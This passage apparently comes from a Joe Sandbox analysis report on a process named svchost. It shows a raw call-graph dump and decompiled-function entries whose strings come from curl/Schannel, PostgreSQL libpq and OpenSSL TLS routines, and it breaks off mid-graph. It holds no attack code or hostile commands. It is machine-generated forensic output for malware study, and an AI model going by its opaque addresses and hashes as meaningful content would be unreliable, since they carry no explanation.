125888->125829 125889->125829 125890->125870 125891 7ffda3774e55 125892 7ffda3774e8b 125891->125892 125896 7ffda3773350 125891->125896 125894 7ffda3774ea4 125892->125894 125906 7ffda37767a0 125892->125906 125914 7ffda377a090 125896->125914 125899 7ffda377336a 125899->125892 125901 7ffda3773380 125905 7ffda3773398 125901->125905 125939 7ffda3776ae0 125901->125939 125905->125892 125907 7ffda3776805 125906->125907 125908 7ffda37767db 125906->125908 125907->125894 125908->125907 125911 7ffda3776801 125908->125911 126156 7ffda377a920 31 API calls Concurrency::details::SchedulerProxy::DeleteThis 125908->126156 125910 7ffda377685f _time64 125910->125911 125911->125907 125911->125910 125913 7ffda37734c0 27 API calls 125911->125913 126150 7ffda3782930 125911->126150 125913->125911 125915 7ffda377a0b4 WSAStartup 125914->125915 125916 7ffda377a0cf WSASetLastError malloc 125914->125916 125917 7ffda377a0c8 125915->125917 125926 7ffda377a0ea 125915->125926 125918 7ffda377a0f1 memset malloc malloc malloc 125916->125918 125916->125926 125917->125916 126087 7ffda378bca0 malloc 125918->126087 125921 7ffda3796230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 125922 7ffda3773362 125921->125922 125922->125899 125927 7ffda3776a20 125922->125927 125923 7ffda378bca0 malloc 125924 7ffda377a1dd 125923->125924 125924->125926 126089 7ffda3779330 125924->126089 125926->125921 126109 7ffda377a810 199 API calls 125927->126109 125929 7ffda3776a42 125930 7ffda3776a4a 125929->125930 126110 7ffda3779240 29 API calls Concurrency::details::SchedulerProxy::DeleteThis 125929->126110 125930->125901 125932 7ffda3776a6a 125933 7ffda3776a6e 125932->125933 125934 7ffda3776aac 125932->125934 125935 7ffda3776a81 free 125933->125935 125936 7ffda3776a96 free 125933->125936 125937 7ffda3776aca free 125934->125937 125938 7ffda3776ab5 free 125934->125938 125935->125935 125935->125936 125936->125901 125937->125901 125938->125937 125938->125938 125940 7ffda3776b10 calloc 125939->125940 125942 7ffda37777e5 125940->125942 125949 7ffda3776bc6 125940->125949 126141 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 125942->126141 125944 7ffda3776f97 125953 7ffda3777009 free 125944->125953 125957 7ffda377701b 125944->125957 125945 7ffda3776d50 126111 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 125945->126111 125946 7ffda3796230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 125947 7ffda377338c 125946->125947 125947->125905 126077 7ffda37768e0 125947->126077 125948 7ffda3776c13 malloc 125955 7ffda3776c33 memcpy 125948->125955 125956 7ffda3776c46 125948->125956 125949->125948 125959 7ffda3776c7d 125949->125959 125950 7ffda3776e2a free 125962 7ffda3776da5 125950->125962 125951 7ffda3776f2f 125961 7ffda3776f9e 125951->125961 125968 7ffda3776f3d 125951->125968 125969 7ffda3776f99 125951->125969 126113 7ffda3772860 30 API calls Concurrency::details::SchedulerProxy::DeleteThis 125953->126113 125954 7ffda3776d4b 125954->125945 125954->125962 125955->125956 125956->125942 125956->125949 125956->125959 125966 7ffda377703e free _strdup 125957->125966 125972 7ffda377705b 125957->125972 126038 7ffda3776da0 125957->126038 125959->125945 125959->125954 125960 7ffda3776cd2 malloc 125959->125960 125959->125962 125964 7ffda3776d0b 125960->125964 125965 7ffda3776cf8 memcpy 125960->125965 126112 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 125961->126112 125962->125950 125963 7ffda3776e54 _strdup 125962->125963 125970 7ffda3776dff isalpha 125962->125970 125973 7ffda3776e7d 125962->125973 125963->125942 125963->125962 125964->125942 125964->125959 125977 7ffda3776d44 125964->125977 125965->125964 125966->125942 125966->125972 125967 7ffda3776ec3 malloc 125974 7ffda3776ee3 memcpy 125967->125974 125975 7ffda3776ef6 125967->125975 125968->125944 125976 7ffda3776f60 _strdup 125968->125976 125969->125944 125969->125961 125970->125962 125978 7ffda377707f memset SHGetFolderPathA 125972->125978 125983 7ffda3777190 125972->125983 125991 7ffda3777119 125972->125991 125973->125944 125973->125951 125973->125967 125974->125975 125975->125942 125975->125951 125975->125973 125976->125942 125976->125968 125977->125945 125977->125954 125980 7ffda37770b1 125978->125980 125978->125991 125979 7ffda37773b6 125981 7ffda37774c9 _strdup 125979->125981 125995 7ffda37773d8 125979->125995 125982 7ffda3791830 Concurrency::details::SchedulerProxy::DeleteThis 12 API calls 125980->125982 125981->125942 125984 7ffda37773f5 125981->125984 125985 7ffda37770cf free malloc 125982->125985 125983->125979 125986 7ffda37771df malloc 125983->125986 125985->125942 125986->125942 125988 7ffda3777203 memcpy 125986->125988 126021 7ffda377722a 125988->126021 125991->125983 126114 7ffda377a9f0 95 API calls Concurrency::details::SchedulerProxy::DeleteThis 125991->126114 125995->125984 125996 7ffda37774a7 125995->125996 126038->125946 126079 7ffda37768ee 126077->126079 126080 7ffda377691d 126077->126080 126078 7ffda37763c0 Concurrency::details::SchedulerProxy::DeleteThis 10 API calls 126078->126080 126081 7ffda377692f 126079->126081 126082 7ffda3776900 126079->126082 126085 7ffda3776913 126079->126085 126080->125905 126142 7ffda37734c0 126081->126142 126148 7ffda378c210 free realloc memcpy free Concurrency::details::SchedulerProxy::DeleteThis 126082->126148 126085->126078 126086 7ffda3776981 126085->126086 126086->125905 126088 7ffda377a1ce 126087->126088 126088->125923 126090 7ffda3779353 free 126089->126090 126097 7ffda377939e Concurrency::details::SchedulerProxy::DeleteThis 126089->126097 126090->126097 126091 7ffda377942e 14 API calls 126092 7ffda37794ed 9 API calls 126091->126092 126099 7ffda37794d2 Concurrency::details::SchedulerProxy::DeleteThis 126091->126099 126094 7ffda3779583 21 API calls 126092->126094 126095 7ffda3779565 Concurrency::details::SchedulerProxy::DeleteThis 126092->126095 126093 7ffda37793b4 free free free 126093->126097 126106 7ffda378bd40 126094->126106 126095->126095 126101 7ffda3779576 free 126095->126101 126097->126091 126097->126093 126097->126097 126105 7ffda377940e free 126097->126105 126103 7ffda37794e3 free 126099->126103 126101->126094 126102 7ffda378bd40 Concurrency::details::SchedulerProxy::DeleteThis free 126104 7ffda37796ac free 126102->126104 126103->126092 126105->126097 126107 7ffda378bd58 free 126106->126107 126108 7ffda37796a0 126106->126108 126107->126108 126108->126102 126109->125929 126110->125932 126111->126038 126112->126038 126113->125957 126114->125991 126141->126038 126143 7ffda3773525 126142->126143 126146 7ffda3774dae 126142->126146 126143->126146 126149 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126143->126149 126144 7ffda3796230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 126146->126144 126148->126085 126149->126146 126157 7ffda3783290 33 API calls Concurrency::details::SchedulerProxy::DeleteThis 126150->126157 126152 7ffda3782946 126153 7ffda378294a 126152->126153 126158 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126152->126158 126153->125911 126155 7ffda3782966 126155->125911 126156->125911 126157->126152 126158->126155 126159 7ffd942e72e0 126160 7ffd942e7329 GetLastError 126159->126160 126162 7ffd942e72ff _Getctype 126159->126162 126161 7ffd942e733c 126160->126161 126164 7ffd942e735a SetLastError 126161->126164 126165 7ffd942e7357 126161->126165 126168 7ffd942e7110 GetLastError 126161->126168 126163 7ffd942e7324 126162->126163 126166 7ffd942e7110 _Getctype 11 API calls 126162->126166 126164->126163 126165->126164 126166->126163 126169 7ffd942e7136 126168->126169 126170 7ffd942e713c SetLastError 126169->126170 126186 7ffd942e6cc0 126169->126186 126171 7ffd942e71b5 126170->126171 126171->126165 126174 7ffd942e7175 FlsSetValue 126176 7ffd942e7198 126174->126176 126177 7ffd942e7181 FlsSetValue 126174->126177 126175 7ffd942e7165 FlsSetValue 126193 7ffd942e6d40 13 API calls 2 library calls 126175->126193 126195 7ffd942e6f28 13 API calls _Getctype 126176->126195 126194 7ffd942e6d40 13 API calls 2 library calls 126177->126194 126179 7ffd942e7173 126179->126170 126182 7ffd942e7196 SetLastError 126182->126171 126183 7ffd942e71a0 126196 7ffd942e6d40 13 API calls 2 library calls 126183->126196 126191 7ffd942e6cd1 _Getctype 126186->126191 126187 7ffd942e6d06 RtlAllocateHeap 126189 7ffd942e6d20 126187->126189 126187->126191 126188 7ffd942e6d22 126197 7ffd942d93a8 13 API calls _Getctype 126188->126197 126189->126174 126189->126175 126191->126187 126191->126188 126192 7ffd942e5790 std::_Facet_Register 2 API calls 126191->126192 126192->126191 126193->126179 126194->126182 126195->126183 126196->126182 126197->126189

                          Executed Functions

                          Function 00007FFDA55CBA86 Relevance: 177.7, APIs: 57, Strings: 44, Instructions: 927COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcfree
                          • String ID: $ $$$(memory blob)$(unknown)$@$AES$CHACHA20_POLY1305$ChainingModeCCM$ChainingModeGCM$CurrentService$CurrentUser$CurrentUserGroupPolicy$LocalMachine$LocalMachineEnterprise$LocalMachineGroupPolicy$Microsoft Unified Security Protocol Provider$P12$SCH_USE_STRONG_CRYPTO$SHA256$SHA384$Services$TLS_AES_128_CCM_8_SHA256$TLS_AES_128_CCM_SHA256$TLS_AES_128_GCM_SHA256$TLS_AES_256_GCM_SHA384$TLS_CHACHA20_POLY1305_SHA256$USE_STRONG_CRYPTO$Users$schannel: AcquireCredentialsHandle failed: %s$schannel: All available TLS 1.3 ciphers were disabled$schannel: Failed setting algorithm cipher list$schannel: Failed to get certificate from file %s, last error is 0x%lx$schannel: Failed to get certificate location or file for %s$schannel: Failed to import cert file %s, last error is 0x%lx$schannel: Failed to import cert file %s, password is bad$schannel: Failed to open cert store %lx %s, last error is 0x%lx$schannel: Failed to read cert file %s$schannel: TLS 1.3 not supported on Windows prior to 11$schannel: This version of Schannel does not support setting an algorithm cipher list and TLS 1.3 cipher list at the same time$schannel: Unknown TLS 1.3 cipher: %.*s$schannel: WARNING: This version of Schannel may negotiate a less-secure TLS version than TLS 1.3 because the user set an algorithm cipher list.$schannel: certificate format compatibility error for %s$schannel: unable to allocate memory
                          • API String ID: 3799942571-230586194
                          • Opcode ID: cd151eb02162fe162480a3690277774b33a588f8d099033d8d492b2adcfb8331
                          • Instruction ID: 079dfff39555339f3f255290acb2e99b60981f7ef017e3a1a77c2370ddb2c10f
                          • Opcode Fuzzy Hash: cd151eb02162fe162480a3690277774b33a588f8d099033d8d492b2adcfb8331
                          • Instruction Fuzzy Hash: 00929E2AB0AB8A86EB12CF21A8603B927A0BF47F94F445135D95D47B97DF7CE144C708
                          Function 00007FFDA3788D70 Relevance: 149.4, APIs: 54, Strings: 31, Instructions: 692COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          • Associated: 00000035.00000002.3362935112.00007FFDA3770000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363010077.00007FFDA37BE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363028789.00007FFDA37BF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: R_get_error_errnofree$S_methodX_ctrlX_freeX_newX_set_cert_cbX_set_default_passwd_cbX_set_default_passwd_cb_userdataX_set_optionslibintl_dgettextmalloc
                          • String ID: %s/%s$0123456789.$certificate does not match private key file "%s": %s$certificate present, but not private key file "%s"$could not create SSL context: %s$could not establish SSL connection: %s$could not get home directory to locate root certificate fileEither provide the file, use the system's trusted roots with sslrootcert=system, or change sslmode to disable server certificate verification.$could not initialize SSL user "%s": %s$could not load SSL user "%s": %s$could not load private SSL key "%s" from user "%s": %s$could not load private key file "%s": %s$could not load system root certificate paths: %s$could not open certificate file "%s": %s$could not read certificate file "%s": %s$could not read private SSL key "%s" from user "%s": %s$could not read root certificate file "%s": %s$could not set SSL Server Name Indication (SNI): %s$could not set maximum SSL protocol version: %s$could not set minimum SSL protocol version: %s$could not stat private key file "%s": %m$invalid value "%s" for maximum SSL protocol version$invalid value "%s" for minimum SSL protocol version$out of memory$out of memory allocating error description$postgresql.crt$postgresql.key$private key file "%s" is not a regular file$root certificate file "%s" does not existEither provide the file, use the system's trusted roots with sslrootcert=system, or change sslmode to disable server certificate verification.$root.crl$root.crt$system
                          • API String ID: 1953776291-2113827057
                          • Opcode ID: 3bc42ec7b35e5b906b041cde520f6272f9448a04cac596296e9510dd570b6f65
                          • Instruction ID: 846981ac28e12454df6fd6ecae2bf4af70c74560415b09232f0d6c737520af0e
                          • Opcode Fuzzy Hash: 3bc42ec7b35e5b906b041cde520f6272f9448a04cac596296e9510dd570b6f65
                          • Instruction Fuzzy Hash: F6629E21F0F64392FA55AB2594303B93393AF46BA6F444632D91E277D7DE3EE4818318
                          Function 00007FFDA33342D0 Relevance: 79.1, APIs: 43, Strings: 2, Instructions: 322COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 560 7ffda33342d0-7ffda333431e call 7ffda33aedf0 * 2 566 7ffda3334320-7ffda3334350 ERR_new ERR_set_debug ERR_set_error 560->566 567 7ffda3334355-7ffda333436d call 7ffda3332f50 560->567 568 7ffda3334887-7ffda333489a 566->568 571 7ffda3334373-7ffda333437a call 7ffda332bff0 567->571 572 7ffda333487b 567->572 576 7ffda33343a3-7ffda33343c0 CRYPTO_zalloc 571->576 577 7ffda333437c-7ffda333439e ERR_new ERR_set_debug 571->577 574 7ffda333487d-7ffda3334882 572->574 574->568 576->572 579 7ffda33343c6-7ffda33343df CRYPTO_THREAD_lock_new 576->579 578 7ffda3334867-7ffda333486e ERR_set_error 577->578 580 7ffda3334873-7ffda3334876 call 7ffda3333a70 578->580 581 7ffda33343e1-7ffda33343e6 ERR_new 579->581 582 7ffda3334408-7ffda333440e 579->582 580->572 584 7ffda33343eb-7ffda3334403 ERR_set_debug 581->584 585 7ffda3334410-7ffda333442f CRYPTO_strdup 582->585 586 7ffda3334435-7ffda33344b9 OPENSSL_LH_new OPENSSL_LH_set_thunks 582->586 584->578 585->580 585->586 588 7ffda33344bb-7ffda33344c5 ERR_new 586->588 589 7ffda33344ca-7ffda33344d6 X509_STORE_new 586->589 588->584 590 7ffda33344ff-7ffda3334514 call 7ffda33ae78e 589->590 591 7ffda33344d8-7ffda33344fa ERR_new ERR_set_debug 589->591 594 7ffda333453d-7ffda3334547 call 7ffda3330eb0 590->594 595 7ffda3334516-7ffda3334538 ERR_new ERR_set_debug 590->595 591->578 598 7ffda3334570-7ffda333457a call 7ffda3349f30 594->598 599 7ffda3334549-7ffda333454e ERR_new 594->599 595->578 603 7ffda3334588-7ffda3334592 call 7ffda334a030 598->603 604 7ffda333457c-7ffda3334586 ERR_new 598->604 601 7ffda3334553-7ffda333456b ERR_set_debug 599->601 601->578 607 7ffda33345a0-7ffda33345aa call 7ffda334a8b0 603->607 608 7ffda3334594-7ffda333459e ERR_new 603->608 604->601 611 7ffda33345b8-7ffda33345ca call 7ffda332df60 call 7ffda332e900 607->611 612 7ffda33345ac-7ffda33345b6 ERR_new 607->612 608->601 617 7ffda33345db-7ffda33345f8 call 7ffda332d360 611->617 618 7ffda33345cc-7ffda33345d6 ERR_new 611->618 612->601 621 7ffda3334609-7ffda333462f call 7ffda332df50 call 7ffda33302b0 617->621 622 7ffda33345fa-7ffda3334604 ERR_new 617->622 618->601 627 7ffda3334845-7ffda3334862 ERR_new ERR_set_debug 621->627 628 7ffda3334635-7ffda3334640 OPENSSL_sk_num 621->628 622->601 627->578 628->627 629 7ffda3334646-7ffda3334655 call 7ffda33ae6a4 628->629 632 7ffda3334657-7ffda333465c ERR_new 629->632 633 7ffda3334666-7ffda33346a3 call 7ffda333ef20 * 2 OPENSSL_sk_new_null 629->633 632->633 638 7ffda33346b4-7ffda33346c3 OPENSSL_sk_new_null 633->638 639 7ffda33346a5-7ffda33346aa ERR_new 633->639 640 7ffda33346d4-7ffda33346ea CRYPTO_new_ex_data 638->640 641 7ffda33346c5-7ffda33346ca ERR_new 638->641 639->638 642 7ffda33346fb-7ffda333471c call 7ffda33ae5e4 640->642 643 7ffda33346ec-7ffda33346f1 ERR_new 640->643 641->640 642->580 646 7ffda3334722-7ffda333472d 642->646 643->642 647 7ffda333472f-7ffda3334734 call 7ffda332e880 646->647 648 7ffda333473b-7ffda3334769 RAND_bytes_ex 646->648 647->648 650 7ffda33347a3 648->650 651 7ffda333476b-7ffda3334783 RAND_priv_bytes_ex 648->651 654 7ffda33347ae-7ffda33347c6 RAND_priv_bytes_ex 650->654 651->650 653 7ffda3334785-7ffda33347a1 RAND_priv_bytes_ex 651->653 653->650 653->654 655 7ffda33347c8-7ffda33347ea ERR_new ERR_set_debug 654->655 656 7ffda33347ec-7ffda33347f6 call 7ffda33541f0 654->656 655->578 659 7ffda3334807-7ffda3334843 call 7ffda33404f0 656->659 660 7ffda33347f8-7ffda33347fd ERR_new 656->660 659->574 660->659
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: R_newR_set_debugR_set_error
                          • String ID: SSL_CTX_new_ex$ssl\ssl_lib.c
                          • API String ID: 1552677711-2988157636
                          • Opcode ID: 197f6834403d833c31d4adf1d62aab5f67e9f57932db730e893f6a281c6a2351
                          • Instruction ID: 8eedc8832a414f5b45e6546998a55bc0a17a76ace3f4d714614a4f43a9f5d14a
                          • Opcode Fuzzy Hash: 197f6834403d833c31d4adf1d62aab5f67e9f57932db730e893f6a281c6a2351
                          • Instruction Fuzzy Hash: D7E15B21F0FF9351FA58BB61D4323B92292AF80744F548435DA0D6A7A7EE3FE4418359
                          Function 00007FFDA333D68B Relevance: 66.7, APIs: 37, Strings: 1, Instructions: 205COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: O_free$L_sk_freeL_sk_pop_free$X509_free$M_freeO_free_allX_free$O_popT_freeX509_
                          • String ID: ssl\ssl_lib.c
                          • API String ID: 1180453015-1984206432
                          • Opcode ID: 2ab30675d38fe794d4143fbd10066cc4eef2f57f3f2657259a153aac8f67add1
                          • Instruction ID: f5a7cb4435bb42b514a6ba22d4422a279ccc5768b7f06fb06ca9b19c0f90c5de
                          • Opcode Fuzzy Hash: 2ab30675d38fe794d4143fbd10066cc4eef2f57f3f2657259a153aac8f67add1
                          • Instruction Fuzzy Hash: 4EA10A61B0EE9280EB44FF26C8A16A93322EF81B89F045435DD4E5B76BCE2FE544C715
                          Function 00007FFDA3330EB0 Relevance: 65.1, APIs: 23, Strings: 14, Instructions: 313COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 692 7ffda3330eb0-7ffda3330eeb call 7ffda33aedf0 695 7ffda3330ef0-7ffda3330ef5 692->695 696 7ffda3330ef7-7ffda3330f01 call 7ffda333ee40 695->696 697 7ffda3330f16-7ffda3330f22 695->697 700 7ffda3330f06-7ffda3330f0c 696->700 697->695 699 7ffda3330f24-7ffda3330f3c 697->699 701 7ffda3330f40-7ffda3330f59 call 7ffda333ef20 699->701 700->697 703 7ffda3330f0e-7ffda3330f10 700->703 705 7ffda3330f65-7ffda3330f6f EVP_MD_get_size 701->705 706 7ffda3330f5b-7ffda3330f63 701->706 703->697 708 7ffda33313ae-7ffda33313c0 705->708 709 7ffda3330f75-7ffda3330f77 705->709 707 7ffda3330f7a-7ffda3330f89 706->707 707->701 710 7ffda3330f8b-7ffda3330fb0 ERR_set_mark EVP_SIGNATURE_fetch 707->710 709->707 711 7ffda3330fb2-7ffda3330fb9 710->711 712 7ffda3330fbb-7ffda3330fbe call 7ffda33ae524 710->712 714 7ffda3330fc3-7ffda3330fdc EVP_KEYEXCH_fetch 711->714 712->714 715 7ffda3330fde-7ffda3330fe8 714->715 716 7ffda3330fea-7ffda3330fed call 7ffda33ae530 714->716 718 7ffda3330ff2-7ffda333100b EVP_KEYEXCH_fetch 715->718 716->718 719 7ffda333100d-7ffda3331017 718->719 720 7ffda3331019-7ffda333101c EVP_KEYEXCH_free 718->720 721 7ffda3331021-7ffda333103a EVP_SIGNATURE_fetch 719->721 720->721 722 7ffda3331045-7ffda3331048 EVP_SIGNATURE_free 721->722 723 7ffda333103c-7ffda3331043 721->723 724 7ffda333104d-7ffda33310ad ERR_pop_to_mark EVP_PKEY_asn1_find_str 722->724 723->724 725 7ffda33310af-7ffda33310cc EVP_PKEY_asn1_get0_info 724->725 726 7ffda33310d2-7ffda33310e6 call 7ffda3353eb0 724->726 725->726 727 7ffda33310ce 725->727 730 7ffda33310e8-7ffda33310f3 726->730 731 7ffda33310f5 726->731 727->726 732 7ffda33310fc-7ffda333111d EVP_PKEY_asn1_find_str 730->732 731->732 733 7ffda333111f-7ffda333113c EVP_PKEY_asn1_get0_info 732->733 734 7ffda3331142-7ffda3331156 call 7ffda3353eb0 732->734 733->734 736 7ffda333113e 733->736 738 7ffda3331158-7ffda3331163 734->738 739 7ffda3331165 734->739 736->734 740 7ffda333116f-7ffda3331190 EVP_PKEY_asn1_find_str 738->740 739->740 741 7ffda3331192-7ffda33311af EVP_PKEY_asn1_get0_info 740->741 742 7ffda33311b5-7ffda33311c9 call 7ffda3353eb0 740->742 741->742 743 7ffda33311b1 741->743 746 7ffda33311d8 742->746 747 7ffda33311cb-7ffda33311d6 742->747 743->742 748 7ffda33311e2-7ffda3331203 EVP_PKEY_asn1_find_str 746->748 747->748 749 7ffda3331228-7ffda333123c call 7ffda3353eb0 748->749 750 7ffda3331205-7ffda3331222 EVP_PKEY_asn1_get0_info 748->750 754 7ffda333123e-7ffda3331249 749->754 755 7ffda333124b 749->755 750->749 752 7ffda3331224 750->752 752->749 756 7ffda3331255-7ffda3331276 EVP_PKEY_asn1_find_str 754->756 755->756 757 7ffda3331278-7ffda3331295 EVP_PKEY_asn1_get0_info 756->757 758 7ffda333129b-7ffda33312a8 call 7ffda3353eb0 756->758 757->758 759 7ffda3331297 757->759 762 7ffda33312b4-7ffda33312d5 EVP_PKEY_asn1_find_str 758->762 763 7ffda33312aa 758->763 759->758 764 7ffda33312d7-7ffda33312f4 EVP_PKEY_asn1_get0_info 762->764 765 7ffda33312fa-7ffda3331307 call 7ffda3353eb0 762->765 763->762 764->765 766 7ffda33312f6 764->766 769 7ffda3331313-7ffda3331334 EVP_PKEY_asn1_find_str 765->769 770 7ffda3331309 765->770 766->765 771 7ffda3331336-7ffda3331353 EVP_PKEY_asn1_get0_info 769->771 772 7ffda3331359-7ffda3331366 call 7ffda3353eb0 769->772 770->769 771->772 773 7ffda3331355 771->773 776 7ffda3331372-7ffda3331381 772->776 777 7ffda3331368 772->777 773->772 778 7ffda3331383 776->778 779 7ffda333138a-7ffda333138c 776->779 777->776 778->779 780 7ffda333138e 779->780 781 7ffda3331398-7ffda33313ad 779->781 780->781
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: Y_asn1_find_strY_asn1_get0_info$E_fetchH_fetchR_pop_to_markR_set_mark$D_get_sizeE_freeH_freeJ_nid2snR_fetch
                          • String ID: $ $ $ $DSA$ECDH$ECDSA$gost-mac$gost-mac-12$gost2001$gost2012_256$gost2012_512$kuznyechik-mac$magma-mac
                          • API String ID: 2321393641-365409564
                          • Opcode ID: 268b19889cf02bf0f91517eb74db770bd30f83b64ba60b829bfd315cebd91123
                          • Instruction ID: 858f06c8c3221e770ec9fb4fa2bb3cd88646a8f950a5040ae38019f513c1bbd5
                          • Opcode Fuzzy Hash: 268b19889cf02bf0f91517eb74db770bd30f83b64ba60b829bfd315cebd91123
                          • Instruction Fuzzy Hash: 1EE19F72F0EF9286E754BF20D4606A93792FF44758F045635EA4E567A6DF3EE0808704
                          Function 00007FFDA3388CA0 Relevance: 58.0, APIs: 24, Strings: 9, Instructions: 244COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1032 7ffda3388ca0-7ffda3388cee call 7ffda33aedf0 CRYPTO_zalloc 1035 7ffda3388d00-7ffda3388d24 1032->1035 1036 7ffda3388cf0-7ffda3388cff 1032->1036 1037 7ffda3388e95-7ffda3388ee2 1035->1037 1038 7ffda3388d2a-7ffda3388d30 1035->1038 1040 7ffda3388eee-7ffda3388ef9 1037->1040 1041 7ffda3388ee4 1037->1041 1038->1037 1039 7ffda3388d36-7ffda3388d3f 1038->1039 1044 7ffda3388d40-7ffda3388d4b 1039->1044 1042 7ffda3388f0b-7ffda3388f23 BIO_free 1040->1042 1043 7ffda3388efb-7ffda3388f05 BIO_up_ref 1040->1043 1041->1040 1045 7ffda3388f35-7ffda3388f44 1042->1045 1046 7ffda3388f25-7ffda3388f2f BIO_up_ref 1042->1046 1043->1042 1047 7ffda338900f-7ffda338901c call 7ffda3388b90 1043->1047 1048 7ffda3388d79-7ffda3388d8a call 7ffda33afc50 1044->1048 1049 7ffda3388d4d-7ffda3388d51 1044->1049 1050 7ffda3388f56-7ffda3388f74 1045->1050 1051 7ffda3388f46-7ffda3388f50 BIO_up_ref 1045->1051 1046->1045 1046->1047 1063 7ffda3389079-7ffda3389094 1047->1063 1065 7ffda3388d8c-7ffda3388d9d OSSL_PARAM_get_uint 1048->1065 1066 7ffda3388db2-7ffda3388dc3 strcmp 1048->1066 1049->1044 1053 7ffda3388d53-7ffda3388d64 OSSL_PARAM_get_int 1049->1053 1055 7ffda3388f76-7ffda3388f7a 1050->1055 1056 7ffda3388fcd-7ffda3388fdf call 7ffda33870a0 1050->1056 1051->1047 1051->1050 1057 7ffda3388e56-7ffda3388e5a 1053->1057 1058 7ffda3388d6a-7ffda3388d74 ERR_new 1053->1058 1055->1056 1062 7ffda3388f7c 1055->1062 1076 7ffda338901e-7ffda3389026 1056->1076 1077 7ffda3388fe1-7ffda3388fe6 ERR_new 1056->1077 1057->1038 1064 7ffda3388feb-7ffda3388ffe ERR_set_debug 1058->1064 1072 7ffda3388f80-7ffda3388f83 1062->1072 1071 7ffda3389003-7ffda338900a ERR_set_error 1064->1071 1065->1057 1067 7ffda3388da3-7ffda3388dad ERR_new 1065->1067 1068 7ffda3388dc5-7ffda3388dd6 OSSL_PARAM_get_uint32 1066->1068 1069 7ffda3388de7-7ffda3388df8 strcmp 1066->1069 1067->1064 1068->1057 1073 7ffda3388dd8-7ffda3388de2 ERR_new 1068->1073 1074 7ffda3388dfa-7ffda3388e0b OSSL_PARAM_get_int 1069->1074 1075 